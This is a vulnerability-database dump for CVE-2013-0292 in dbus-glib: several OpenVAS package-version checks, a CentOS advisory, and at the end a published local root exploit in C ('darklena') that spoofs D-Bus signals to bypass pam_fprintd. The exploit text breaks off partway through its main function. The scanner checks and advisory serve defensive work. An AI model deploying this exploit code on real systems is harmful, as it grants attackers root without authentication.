"2019-03-15T00:00:00", "published": "2013-08-20T00:00:00", "id": "OPENVAS:1361412562310866781", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866781", "type": "openvas", "title": "Fedora Update for dbus-glib FEDORA-2013-12199", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dbus-glib FEDORA-2013-12199\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866781\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-20 15:27:03 +0530 (Tue, 20 Aug 2013)\");\n script_cve_id(\"CVE-2013-0292\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for dbus-glib FEDORA-2013-12199\");\n\n\n script_tag(name:\"affected\", value:\"dbus-glib on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-12199\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110908.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dbus-glib'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.100~5.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-03-12T00:00:00", "id": "OPENVAS:1361412562310881631", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881631", "type": "openvas", "title": "CentOS Update for dbus-glib CESA-2013:0568 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dbus-glib CESA-2013:0568 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019617.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881631\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 09:58:45 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2013-0292\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0568\");\n script_name(\"CentOS Update for dbus-glib CESA-2013:0568 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dbus-glib'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"dbus-glib on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"dbus-glib is an add-on library to integrate the standard D-Bus library with\n the GLib main loop and threading model.\n\n A flaw was found in the way dbus-glib filtered the message sender (message\n source subject) when the 'NameOwnerChanged' signal was received. This\n could trick a system service using dbus-glib (such as fprintd) into\n believing a signal was sent from a privileged process, when it was not. A\n local attacker could use this flaw to escalate their privileges.\n (CVE-2013-0292)\n\n All dbus-glib users are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. All running applications\n linked against dbus-glib, such as fprintd and NetworkManager, must be\n restarted for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.86~6.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-glib-devel\", rpm:\"dbus-glib-devel~0.86~6.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-19T15:09:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "description": "Check for the Version of dbus-glib", "modified": "2018-01-19T00:00:00", "published": "2013-08-20T00:00:00", "id": "OPENVAS:866781", "href": "http://plugins.openvas.org/nasl.php?oid=866781", "type": "openvas", "title": "Fedora Update for dbus-glib FEDORA-2013-12199", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dbus-glib FEDORA-2013-12199\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866781);\n script_version(\"$Revision: 8466 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 07:58:30 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-20 15:27:03 +0530 (Tue, 20 Aug 2013)\");\n script_cve_id(\"CVE-2013-0292\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for dbus-glib FEDORA-2013-12199\");\n\n tag_insight = \"D-Bus add-on library to integrate the standard D-Bus library with\nthe GLib thread abstraction and main loop.\n\";\n\n tag_affected = \"dbus-glib on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-12199\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110908.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of dbus-glib\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.100~5.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:1361412562310870941", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870941", "type": "openvas", "title": "RedHat Update for dbus-glib RHSA-2013:0568-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for dbus-glib RHSA-2013:0568-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00075.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870941\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:19 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-0292\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0568-01\");\n script_name(\"RedHat Update for dbus-glib RHSA-2013:0568-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dbus-glib'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(6|5)\");\n script_tag(name:\"affected\", value:\"dbus-glib on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"dbus-glib is an add-on library to integrate the standard D-Bus library with\n the GLib main loop and threading model.\n\n A flaw was found in the way dbus-glib filtered the message sender (message\n source subject) when the NameOwnerChanged signal was received. This\n could trick a system service using dbus-glib (such as fprintd) into\n believing a signal was sent from a privileged process, when it was not. A\n local attacker could use this flaw to escalate their privileges.\n (CVE-2013-0292)\n\n All dbus-glib users are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. All running applications\n linked against dbus-glib, such as fprintd and NetworkManager, must be\n restarted for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.86~6.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-glib-debuginfo\", rpm:\"dbus-glib-debuginfo~0.86~6.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-glib-devel\", rpm:\"dbus-glib-devel~0.86~6.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.73~11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-glib-debuginfo\", rpm:\"dbus-glib-debuginfo~0.73~11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-glib-devel\", rpm:\"dbus-glib-devel~0.73~11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "description": "Oracle Linux Local Security Checks ELSA-2013-0568", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123691", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123691", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0568", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0568.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123691\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:07:17 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0568\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0568 - dbus-glib security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0568\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0568.html\");\n script_cve_id(\"CVE-2013-0292\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.73~11.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dbus-glib-devel\", rpm:\"dbus-glib-devel~0.73~11.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.86~6.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dbus-glib-devel\", rpm:\"dbus-glib-devel~0.86~6.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-19T15:09:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "description": "Check for the Version of dbus-glib", "modified": "2018-01-19T00:00:00", "published": "2013-07-16T00:00:00", "id": "OPENVAS:866061", "href": "http://plugins.openvas.org/nasl.php?oid=866061", "type": "openvas", "title": "Fedora Update for dbus-glib FEDORA-2013-12156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dbus-glib FEDORA-2013-12156\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"dbus-glib on Fedora 18\";\ntag_insight = \"D-Bus add-on library to integrate the standard D-Bus library with\n the GLib thread abstraction and main loop.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(866061);\n script_version(\"$Revision: 8466 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 07:58:30 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-16 10:14:36 +0530 (Tue, 16 Jul 2013)\");\n script_cve_id(\"CVE-2013-0292\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for dbus-glib FEDORA-2013-12156\");\n\n script_xref(name: \"FEDORA\", value: \"2013-12156\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/111404.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of dbus-glib\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.100~3.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2020-10-30T13:20:26", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0292"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0568\n\n\ndbus-glib is an add-on library to integrate the standard D-Bus library with\nthe GLib main loop and threading model.\n\nA flaw was found in the way dbus-glib filtered the message sender (message\nsource subject) when the \"NameOwnerChanged\" signal was received. This\ncould trick a system service using dbus-glib (such as fprintd) into\nbelieving a signal was sent from a privileged process, when it was not. A\nlocal attacker could use this flaw to escalate their privileges.\n(CVE-2013-0292)\n\nAll dbus-glib users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. All running applications\nlinked against dbus-glib, such as fprintd and NetworkManager, must be\nrestarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031296.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031655.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-February/007007.html\n\n**Affected packages:**\ndbus-glib\ndbus-glib-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0568.html", "edition": 7, "modified": "2013-03-09T00:44:53", "published": "2013-02-27T20:09:18", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-February/007007.html", "id": "CESA-2013:0568", "title": "dbus security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-12T05:52:02", "edition": 2, "description": "Exploit for linux platform in category local exploits", "published": "2014-06-03T00:00:00", "type": "zdt", "title": "dbus-glib pam_fprintd - Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0292"], "modified": "2014-06-03T00:00:00", "id": "1337DAY-ID-22315", "href": "https://0day.today/exploit/description/22315", "sourceData": "/* darklena. fprintd/pam_fprintd local root PoC. However dbus-glib plays an important role.\r\n *\r\n * (C) 2013 Sebastian Krahmer, all rights reversed.\r\n *\r\n * pam_fprintd uses net.reactivated.Fprint service to trigger finger swiping and\r\n * registers DBUS signal inside the PAM authentication function:\r\n *\r\n * dbus_g_proxy_add_signal(dev, \"VerifyStatus\", G_TYPE_STRING, G_TYPE_BOOLEAN, NULL);\r\n * dbus_g_proxy_add_signal(dev, \"VerifyFingerSelected\", G_TYPE_STRING, NULL);\r\n * dbus_g_proxy_connect_signal(dev, \"VerifyStatus\", G_CALLBACK(verify_result),\r\n * data, NULL);\r\n *\r\n * Then, when the DBUS signal arrives, the signal argument is basically just checked\r\n * to be the \"verify-match\" string; which however is expected to come from the legit\r\n * net.reactivated.Fprint service. Since there is no message filter registered in either\r\n * pam_fprintd, nor inside dbus-glib which it is using, such signals can be spoofed\r\n * by anyone. In order to do so, we first need to spoof a NameOwnerChanged signal\r\n * so the dbus_g_proxy_manager_filter() function inside dbus-glib will find our\r\n * sender-name (which cannot be spoofed) inside its hash tables and match it to\r\n * net.reactivated.Fprint.\r\n *\r\n * To test this PoC, start a service (su is fine) as user that is using pam_fprintd.\r\n * On a second xterm, when you see 'Swipe your ... finger' message start this PoC\r\n * and you will notice that a rootshell is spawned in the first xterm w/o giving your finger. :p\r\n *\r\n * Used various DBUS tutorials and example code, while writing this.\r\n *\r\n * $ cc darklena.c `pkg-config --cflags dbus-1` -ldbus-1 -Wall\r\n *\r\n */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <dbus/dbus.h>\r\n \r\n \r\nvoid die(const char *s)\r\n{\r\n perror(s);\r\n exit(errno);\r\n}\r\n \r\n \r\nint main(int argc, char **argv)\r\n{\r\n DBusError err;\r\n DBusConnection *conn = NULL;\r\n DBusMessage *vrfy_msg = NULL, *noc_msg = NULL, *nl_msg = NULL, *reply = NULL;\r\n dbus_uint32_t serial = 0;\r\n dbus_bool_t t = 1;\r\n int un = 0, i = 0, reply_to = -1;\r\n const char *vrfy_match = \"verify-match\", *cname = NULL,\r\n *name = \"net.reactivated.Fprint\", *prev_owner = NULL;\r\n char dest[32];\r\n \r\n /* override unique name of net.reactivated.Fprint */\r\n if (argc > 1)\r\n prev_owner = strdup(argv[1]);\r\n \r\n printf(\"\\n[**] darklena, pam_fprintd PoC exploit 2013\\n\\n\");\r\n \r\n printf(\"[*] Initializing DBUS ...\\n\");\r\n dbus_error_init(&err);\r\n conn = dbus_bus_get(DBUS_BUS_SYSTEM, &err);\r\n \r\n if (dbus_error_is_set(&err)) {\r\n fprintf(stderr, \"Error: %s\\n\", err.message);\r\n die(\"dbus_error_is_set\");\r\n }\r\n \r\n if ((cname = dbus_bus_get_unique_name(conn)) == NULL)\r\n die(\"dbus_bus_get_unique_name\");\r\n \r\n un = atoi(strchr(cname, '.') + 1);\r\n \r\n printf(\"[+] Done. Found my unique name: %s (%d)\\n\", cname, un);\r\n \r\n if (!prev_owner) {\r\n printf(\"[*] Trying to find unique name of '%s' ...\\n\", name);\r\n nl_msg = dbus_message_new_method_call(\"org.freedesktop.DBus\",\r\n \"/org/freedesktop/DBus\",\r\n \"org.freedesktop.DBus\",\r\n \"GetNameOwner\");\r\n \r\n if (!dbus_message_append_args(nl_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_INVALID))\r\n die(\"[-] dbus_message_append_args\");\r\n \r\n reply = dbus_connection_send_with_reply_and_block(conn, nl_msg, reply_to, &err);\r\n dbus_message_unref(nl_msg);\r\n \r\n if (dbus_error_is_set(&err)) {\r\n fprintf (stderr, \"[-] Error: %s\\n\", err.message);\r\n die(\"[-] dbus_connection_send_with_reply_and_block\");\r\n }\r\n \r\n if (!dbus_message_get_args(reply, &err,\r\n DBUS_TYPE_STRING, &prev_owner, DBUS_TYPE_INVALID)) {\r\n fprintf(stderr, \"[-] Error: %s\\n\", err.message);\r\n die(\"[-] dbus_message_get_args\");\r\n }\r\n \r\n dbus_message_unref(reply);\r\n }\r\n \r\n printf(\"[+] Found unique name of '%s' as '%s'\\n\", name, prev_owner);\r\n \r\n for (i = 1; i < 20; ++i) {\r\n /* spoof a NameOwnerChanged signal */\r\n noc_msg = dbus_message_new_signal(\"/org/freedesktop/DBus\",\r\n \"org.freedesktop.DBus\",\r\n \"NameOwnerChanged\");\r\n \r\n /* spoof a VerifyStatus */\r\n vrfy_msg = dbus_message_new_signal(\"/net/reactivated/Fprint/Device/0\",\r\n \"net.reactivated.Fprint.Device\",\r\n \"VerifyStatus\");\r\n \r\n if (!vrfy_msg || !noc_msg)\r\n die(\"[-] dbus_message_new_signal\");\r\n \r\n if (!dbus_message_append_args(noc_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_STRING,\r\n &prev_owner, DBUS_TYPE_STRING, &cname, DBUS_TYPE_INVALID))\r\n die(\"[-] dbus_message_append_args1\");\r\n \r\n if (!dbus_message_append_args(vrfy_msg, DBUS_TYPE_STRING, &vrfy_match,\r\n DBUS_TYPE_BOOLEAN, &t, DBUS_TYPE_INVALID))\r\n die(\"[-] dbus_message_append_args2\");\r\n 